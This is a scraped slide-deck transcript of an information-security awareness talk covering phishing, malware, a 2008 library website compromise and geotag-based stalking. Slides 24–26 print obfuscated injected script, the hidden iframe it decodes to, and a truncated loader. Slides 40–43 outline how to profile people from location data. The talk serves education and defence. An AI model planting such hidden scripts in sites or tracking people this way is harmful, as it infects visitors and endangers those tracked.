1 / 55

Malware, Big Hacks, and Stalking: Information Security at a Glance

Malware, Big Hacks, and Stalking: Information Security at a Glance. Ben Jackson, Mayhemic Labs. Objectives. Become familiar with InfoSec Understand security threats Learn defensive measures Ultimately, shed some light on the activities behind the curtain.

chavez
Download Presentation

Malware, Big Hacks, and Stalking: Information Security at a Glance

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Malware, Big Hacks, and Stalking: Information Security at a Glance Ben Jackson, Mayhemic Labs

  2. Objectives Become familiar with InfoSec Understand security threats Learn defensive measures Ultimately, shed some light on the activities behind the curtain

  3. The Information Superhighway!(Imagined)

  4. The Information Superhighway!(Reality)

  5. InfoSec Defined “protecting information and information systems from unauthorized access, use, disclosure, disruption, modification or destruction” - Wikipedia

  6. InfoSec defined • Confidentiality • You don’t want your data getting out • Integrity • You don’t want your data altered • Availability • You want to access your data

  7. Seems simple, what’s the big deal? IT presence both inside and outside of “traditional roles” is constantly expanding People want information anytime and anywhere via an increasing number of different devices Increased reliance on technology also increases risk of exposure to attacks

  8. Threats • Phishing • Attempting to steal sensitive information by masquerading as a trustworthy entity in an electronic communication • Primarily via spoofed e-mail and web sites • Increasingly, IM is the tool of choice • Pharming • Re-directing users to fraudulent web sites • DNS cache poisoning • Modified HOSTS file • Typo-Squatting

  9. Threats • Viruses • “a piece of code that adds itself to other programs” (Spafford, 1988) • Cannot run independently - requires that its “host” program be run to activate it.

  10. More Threats • Worms • “a program that can run by itself and can propagate a fully working version of itself to other machines.” (Spafford, 1988) • Uses up resources because it continually self-replicates itself Takes up storage and memory. • Not necessarily malicious

  11. Perfect example of a worm

  12. Even More Threats • Info Stealers • Surveillance software/spyware that records every keystroke into a hidden/encrypted log file • Log file is periodically transmitted to the attacker • Used to steal financial account numbers (Banks, eBay, PayPal, credit cards, etc.)

  13. Guess what? More Threats • Spyware • Software used to track Internet activities, redirect browser to certain web sites • Sometimes also employs an Info Stealer

  14. One big happy family!

  15. Malware? • Short for “Malicious Software” • Catch All Term • This is the preferred term to the other catch all “computer virus” • Every computer virus is malware, but not all malware is a computer virus.

  16. Why would anyone want to attack me? • How many sensitive things do you do on your computer? • Personal • Banking • Online Auctions • Bill Payment • Work • Login Credentials • Employee Information • Other “Personally Identifiable Information”

  17. I don’t have any of that… • Even if you don’t have sensitive information, you can still be used to attack others • What if I want to attack one of your friends who works at a target of mine? • Compromise your e-mail? • Pose as you on Facebook? • Attack him or her via Instant Messenger?

  18. Have I been compromised? • “I’m not compromised!” • How are you sure? • Possible Warning signs: • Computer suddenly noticeably slower? • Mysterious failures in commonly used applications? • Unexpected Pop up windows? • Mysterious/Unexpected behavior?

  19. How did I get compromised? • Sadly, it’s easy • All too common • Let’s walk though and example • New York Public Library • Website was compromised late-2008 • Used to distribute malware

  20. That site’s harmless! … Isn’t it?

  21. That link’s harmless, isn’t it?

  22. Wait a minute… http://ga6.org/enypl/home.html

  23. Nothing to see here folks…

  24. Obfuscation! <script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script> Hidden in that webpage is: What’s that?

  25. Obfuscation deobfuscated! <iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden;display: none"></iframe> • What’s really there: • Hosted in Malaysia • This redirects user to: • “http[:]//meraxe.com/fsp1/index.php” • Also hosted in Malaysia • This all happens silently and invisibly! • What’s at meraxe.com…?

  26. Game over <script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script> • At meraxe.com, we find: • Effects: • Something is silently downloaded and executed by your computer

  27. What happened?!?! • What happened??? • Downloaded and executed a file (age.exe) • Added file c:\WINDOWS\system32\control.dll • Added several Registry entries • Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and becomes a keylogger • Deleted itself

  28. Pwnz0r3d! • Control.dll monitors data entered into forms in IE • Steals user’s login credentials for legitimate web sites • On-line banking, credit cards, eBay, Paypal, etc, etc • “Phones home” with stolen data

  29. What have we learned? • The Lesson? • Constant vigilance is vital • A single “careless click” is all it takes • Simply viewing a web page can result in infection. • Bottom Line: • The web is a scary place.

  30. Why don’t they call it “Computer Security?” • Computers are a common attack vector, but information is what everyone is after • How much Information do you generate on a daily basis? • More importantly, how can this be used against you?

  31. Locational Privacy • “Locational privacy (also known as "location privacy") is the ability of an individual to move in public space with the expectation that under normal circumstances their location will not be systematically and secretly recorded for later use.” • Electronic Frontier Foundationhttp://www.eff.org/wp/locational-privacy

  32. Threats to your Locational Privacy (From the EFF) • Monthly transit swipe-cards • Electronic tolling devices • Traffic Cameras • Mobile Telephones • Electronic swipe cards for doors • Services telling you when your friends are nearby • However… They did miss one…

  33. GeoTags • Small bits of EXIF (Exchangeable image file format) data that encodes the latitude, longitude, altitude, and relative direction of where the photo was taken • A lot of phones have this turned on by default • Why? Someone thought it was a good idea, I guess • Already a bad idea if you’re taking photos for later publication, but what happens when you’re instantly publishing them?

  34. The Tweet that started it all…

  35. Small Scale Test: Sucessful

  36. Google Street View Anyone?

  37. Turning around…

  38. Nice house Adam!

  39. Not an isolated incident • After research, we discovered that about 3% of photos posted to Twitter have Geo-Tags on them • Doesn’t sound like a lot, but how many photos are posted to Twitter each day?

  40. What’s the big deal? • I want to steal something from your co-op’s network… • Thanks to your sharing habits I know • Where you live… • That you’re telecommuting today… • That you “check into” a Starbucks every day around 10AM… • Boy, lets hope you logged out of your VPN before you left!

  41. Or how about… • What if I want something stored on your laptop? • Thanks to your sharing habits I know • That you “check into” a Panera Saturday afternoons • That your code repository for your personal project gets updated before your “check in” at your home • What happens if I sit at that Panera and poison their WiFi connection? • Or if I just take your laptop when you go for a refill?

  42. Some other scenarios • Why do you and your attractive classmate both go to dinner the same fancy restaurant every Tuesday after work? • Doesn’t your significant other have Yoga that night? • Why are you in a coffee shop nowhere near your apartment every Friday night? • Isn’t that close to a local AA meeting?

  43. But Wait! There’s More! • Stalking • OK, someone might not be stalking you, but what about your friends? • Can I establish a pattern of their behavior from information you post? • Surveillance • People love routines, why did you break yours?

  44. ICanStalkU.com

  45. Some Stats… • Trawler averages around 15GB of downloads per day. • 35000 Tweets scanned • 20000 Pictures reaped • Probably around 4 million photos since we started the project • Honestly, we stopped counting • 120000 photos found

  46. Join InfoSec: Fame and Fortune can be yours! • Apparently when you say you’re stalking everyone on Twitter, people notice. • NY Times, BBC, ABC News, Today Show, Toronto Star, CNET to name a few… • You also get your ISP banned from using TwitPic • Whoops!

  47. Protecting Yourself • Patch, Patch, Patch! • Use auto-update whenever possible • Patch Everything • Adobe is a favorite target of attackers right now. Flash and Acrobat especially. • Use both Anti-Virus and Anti-Malware Software • Update every day

  48. Protecting Yourself (cont.) • Practice “Safe Internet” • Don’t click links you don’t know • Don’t open unexpected e-Mail attachments • Don’t Download from Questionable Sites (esp. Freeware) • Don’t use Peer-to-Peer software

  49. Protecting Yourself (cont.) • Beware Wireless Routers/Access Points: • At home… • Change default password and default SSID • Enable “WPA2” encryption • Enable and use MAC filtering • And on the road… • Who’s watching your traffic at Starbucks?

  50. Protecting Yourself (cont.) • Don’t save user IDs and passwords on your hard drive • Use a separate computer for “sensitive” transactions • Banking • Paying bills • Credit Cards • …and nothing else

More Related